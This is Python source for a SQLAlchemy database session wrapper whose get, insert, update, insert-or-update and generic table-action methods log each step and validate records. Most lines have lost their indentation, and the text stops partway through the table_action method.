#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# DB <--session--> sqlalchemy workspace
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get(self, table_model, get_specification, output_method='', caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'get')
print('')
if output_method.upper().find('DICT') >= 0 or output_method.upper().find('JSON') >= 0:
return self.get_table_row_as_dict(table_model, get_specification, caller_area=caller_area, **kwargs)
elif output_method.upper().find('HTML') >= 0:
return self.get_table_row_as_dict(table_model, get_specification, caller_area=caller_area, **kwargs)
else:
return self.get_table_row(table_model, get_specification, caller_area=caller_area, **kwargs)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_rows(self, table_model, get_specification, output_method='', caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'get_rows')
print('')
if output_method.upper().find('DICT') >= 0 or output_method.upper().find('JSON') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
elif output_method.upper().find('HTML') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
else:
return self.get_table_rows(table_model, get_specification, caller_area=caller_area, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_list(self, table_model, get_specification, output_method='', caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'list')
print('')
if output_method.upper().find('DICT') >= 0 or output_method.upper().find('JSON') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
elif output_method.upper().find('HTML') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
else:
return self.get_table_rows(table_model, get_specification, caller_area=caller_area, **kwargs)
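    # Hypothetical usage sketch (model name and filter are illustrative only):
    #   dbsession = leandroutechnologyforward_database_session_class(engine)
    #   row_dict = dbsession.get(UserModel, {'user_id': 42},
    #                            output_method='DICT', caller_area=caller_area)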
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def refresh(self, table_model, data_record, auto_commit=False, caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'refresh')
print('')
return self.insert_or_update(table_model, data_record, auto_commit=auto_commit, caller_area=caller_area, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# session support functions
# form DB --> sqlalchemy workspace
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_table_row(self, table_model, get_specification, caller_area={}, **kwargs):
_method_name = 'get_table_row'
_method_action = 'get'
_method_entity = table_model.__name__
_method_table=table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'get_specification', get_specification, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
filter_specification = self.smart_locate_expression(table_model, get_specification)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
#str(query.count())
if not query_rows >= 1:
color = '' #'#RED#'
msgx = f"NOT-FOUND" #, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'warning',msg,**_process_call_area)
return None
current_record_obj = query.first()
color = '' #color = '' #color = '#GREEN#'
x=''
if query_rows > 1:
color = '' #'#RED#'
x = 's'
msgx = f"{color}OK, {query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID, 'success', msg, **_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_table_rows(self, table_model, get_specification, caller_area={}, **kwargs):
_method_name = 'get_table_rows'
_method_action = 'get_table_rows'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'get_specification', get_specification, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
filter_specification = self.smart_locate_expression(table_model, get_specification)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
if not query_rows >= 1:
color = '' #'#RED#'
msgx = f"NOT-FOUND" #, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'warning',msg,**_process_call_area)
return None
current_record_objects = query.all()
color = '' #color = '#GREEN#'
x=''
if query_rows > 1:
color = '' #'#RED#'
x = 's'
msgx = f"{color}OK, {query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'success',msg,**_process_call_area)
return current_record_objects
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def insert_or_update(self, table_model, data_record, auto_commit=False, caller_area={}, **kwargs):
_method_name = 'insert_or_update'
_method_action = 'insert_or_update'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
filter_specification = self.smart_locate_expression(table_model, data_record)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
        if not query:
            msg = "query failed" + " #C0#" + msg1
            log_process_result_message(_method_msgID, 'error', msg, **_process_call_area)
            return None
        query_rows = query.count()
        if query_rows < 1:
            msg = "NOT-FOUND" + " #C0#" + msg1
            log_process_result_message(_method_msgID, 'warning', msg, **_process_call_area)
            current_record_obj = None
        else:
            current_record_obj = query.first()
            plural = 's' if query_rows > 1 else ''
            msg = f"OK, {query_rows} row{plural} retrieved" + " #C0#" + msg1
            log_process_message(_method_msgID, 'success', msg, **_process_call_area)
if not current_record_obj:
_method_action='ADD'
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
            if changes:
                log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': valid_fields_dictionary, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
msg = f'OK. {table_model.__name__.upper()} added'
rows_added=1
else:
rows_added=0
msg = f'OK. {table_model.__name__.upper()} ready for addition'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':rows_added,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
else:
_method_action='UPDATE'
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
            if changes:
                log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {table_model.__name__.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': valid_fields_dictionary, 'rows_added':0,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
                msg = 'update validation errors'
                api_result = {'api_status': 'error', 'api_message': msg, 'api_data': current_record_obj.to_dict(), 'messages': messages, 'rows_updated': 0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
if auto_commit:
try:
self.commit(**_process_call_area)
msg = f'OK. {table_model.__name__.upper()} updated'
rows_updated = 1
except Exception as error_text:
msg = f'{table_model.__name__.upper()} update failed:{error_text}'
rows_updated = 0
print(error_text)
else:
rows_updated=0
msg = f'OK. {table_model.__name__.upper()} ready for update'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':0,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
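    # Usage sketch (hypothetical `User`/`db`): insert refuses to create a row
    # when the smart-locate filter already matches one, returning None instead.
    # With auto_commit=False the row is added to the session but not committed:
    #
    #     user = db.insert(User, {'email': 'ada@example.com', 'name': 'Ada'},
    #                      auto_commit=False, caller_area=caller_area)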
def insert(self, table_model, data_record, auto_commit=False, caller_area={}, **kwargs):
_method_name='insert'
_method_action='ADD'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
messages=[]
filter_specification = self.smart_locate_expression2(table_model, data_record)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
        if not query:
            msg = "query failed" + " #C0#" + msg1
            log_process_result_message(_method_msgID, 'error', msg, **_process_call_area)
            return None
        query_rows = query.count()
        if query_rows < 1:
            msg = "OK, not found" + " #C0#" + msg1
            log_process_message(_method_msgID, 'success', msg, **_process_call_area)
            current_record_obj = None
        else:
            current_record_obj = query.first()
            plural = 's' if query_rows > 1 else ''
            msg = f"{query_rows} row{plural} retrieved" + " #C0#" + msg1
            log_process_message(_method_msgID, 'warning', msg, **_process_call_area)
if current_record_obj:
current_record_dict = current_record_obj.to_dict()
msg=f'[{table_model.__name__.upper()}] already exists. filter: [[{filter_specification}]]'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': current_record_dict, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
_method_action='ADD'
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
        if changes:
            log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': valid_fields_dictionary, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
        if auto_commit:
            self.commit(**_process_call_area)
            msg = f'OK. {table_model.__name__.upper()} added and committed'
            rows_added = 1
        else:
            rows_added = 1
            msg = f'OK. {table_model.__name__.upper()} added, not committed'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':rows_added,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
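    # Usage sketch (hypothetical names): update_filter selects the row while
    # data_record carries the new values; without update_filter, data_record
    # itself is used to locate the row:
    #
    #     user = db.update(User, {'name': 'Ada Lovelace'},
    #                      update_filter={'email': 'ada@example.com'},
    #                      auto_commit=True, caller_area=caller_area)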
def update(self, table_model, data_record, update_filter={}, auto_commit=False, caller_area={}, **kwargs):
_method_name='update'
_method_action = 'UPDATE'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
messages=[]
        # build the record-locate filter: an explicit update_filter wins,
        # otherwise the data_record itself identifies the row
        if update_filter:
            locate_dict = {**update_filter}
        else:
            locate_dict = {**data_record}
filter_specification = self.smart_locate_expression(table_model, locate_dict)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
        if not query:
            msg = "query failed" + " #C0#" + msg1
            log_process_result_message(_method_msgID, 'error', msg, **_process_call_area)
            return None
        query_rows = query.count()
        if query_rows < 1:
            msg = "NOT-FOUND" + " #C0#" + msg1
            log_process_message(_method_msgID, 'warning', msg, **_process_call_area)
            current_record_obj = None
        else:
            current_record_obj = query.first()
            msgType = 'warning' if query_rows > 1 else 'success'
            plural = 's' if query_rows > 1 else ''
            msg = f"OK, {query_rows} row{plural} retrieved" + " #C0#" + msg1
            log_process_message(_method_msgID, msgType, msg, **_process_call_area)
        if not current_record_obj:
            msg = f'[{table_model.__name__.upper()}] does not exist. filter: [[{filter_specification}]]'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': data_record, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
        if changes:
            log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {table_model.__name__.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': valid_fields_dictionary, 'rows_added':0,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
            msg = f'{_method_entity.upper()} update validation errors'
            api_result = {'api_status': 'error', 'api_message': msg, 'api_data': current_record_obj.to_dict(), 'messages': messages, 'rows_updated': 0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
        if auto_commit:
            self.commit(**_process_call_area)
            msg = f'OK. {table_model.__name__.upper()} updated and committed'
            rows_updated = 1
        else:
            rows_updated = 1
            msg = f'OK. {table_model.__name__.upper()} updated, not committed'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':0,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
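    # Usage sketch (hypothetical names): table_action is the generic dispatcher
    # and, unlike the methods above, returns an api_result dict rather than an
    # ORM object:
    #
    #     result = db.table_action(User, 'DEACTIVATE', {},
    #                              action_filter={'email': 'ada@example.com'},
    #                              auto_commit=True, caller_area=caller_area)
    #     if result['api_status'] == 'success':
    #         ...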
def table_action(self, table_model, action, data_record, action_filter={}, auto_commit=False, caller_area={}, **kwargs):
_method_name = 'table_action'
_method_action = action
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)+' #XBLUE#'+_method_action.upper()+'#C0#'
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
msg=f'#C0#action=#BLUE#{action.upper()}#C0#'
log_process_message(_method_msgID, '', msg, **_process_call_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record,**_process_call_area)
log_process_input(_method_msgID, 'action_filter', action_filter,**_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area,**_process_call_area)
row_count = 0
rows_updated = 0
action = action.replace('_', '-')
actions_supported = ('ADD', 'UPDATE', 'UPDATE-ROWS', 'REFRESH', 'REGISTER', 'UNREGISTER', 'DELETE', 'REMOVE', 'ACTIVATE', 'DEACTIVATE', 'CONFIRM', 'INQUIRY', 'LIST', 'GET')
if action.upper() not in actions_supported:
msg = f"action '{action}' not supported. {actions_supported}"
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': actions_supported, 'row_count':row_count,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
now = datetime.datetime.utcnow()
# record filter expression
if action_filter:
locate_dict = {**action_filter}
else:
locate_dict = {**data_record}
        if action.upper() == 'LIST':
            records_dict = self.get_table_rows_as_dict(table_model, locate_dict, caller_area=_process_call_area, **kwargs)
row_count = len(records_dict)
msg = f"OK. {row_count} {_method_entity.upper()} rows retrieved"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': records_dict, 'api_data_rows': row_count, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper()=='UPDATE-ROWS':
locate_dict = {**action_filter}
records = self.get_table_rows(table_model, action_filter, caller_area=_process_call_area, **kwargs)
if not records:
records={}
row_count = len(records)
msg = f"OK. {row_count} {_method_entity.upper()} rows retrieved"
if len(records) <= 0:
msg = f"zero {_method_entity.upper()} records found. No Update"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': {},'row_count':row_count,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
rows_updated = 0
for current_record_obj in records:
record_dict = current_record_obj.to_dict()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
                if changes:
                    log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
self.rollback(**_process_call_area)
return api_result
else:
if current_record_obj.has_model_changed():
rows_updated = rows_updated + 1
if rows_updated>0 and auto_commit:
self.commit(**_process_call_area)
records_dict = self.rows_to_dict(table_model,records)
msg = f'OK. {rows_updated} {_method_entity.upper()} rows updated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': records_dict, 'row_count':row_count,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        # locate the single target record in the database
        current_record_obj = self.get_table_row(table_model, locate_dict, caller_area=_process_call_area, **kwargs)
        # generic validations apply below, keyed on whether the record exists
if current_record_obj:
record_dict = current_record_obj.to_dict()
            if action.upper() == 'ADD':
msg=f'{_method_entity.upper()} already exist'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
else:
if action.upper() not in ('ADD', 'REFRESH','REGISTER'):
current_record_obj=table_model()
record_dict = current_record_obj.valid_model_fields_dictionary(data_record)
msg = f'{_method_entity.upper()} not found'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        if action.upper() == 'ADD':
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
            if changes:
                log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg=f'OK. {_method_entity.upper()} added'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':1, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
        elif action.upper() == 'UPDATE':
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
            if changes:
                log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {_method_entity.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg = f'OK. {_method_entity.upper()} updated'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_updated':1, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper() in ('REFRESH','REGISTER'):
if not current_record_obj:
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
                if changes:
                    log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': record_dict, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
record_dict = current_record_obj.to_dict()
msg=f'OK. {_method_entity.upper()} added'
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': record_dict, 'rows_added':1,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
else:
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
                if changes:
                    log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {_method_entity.upper()} is synchronized. no changes applied"
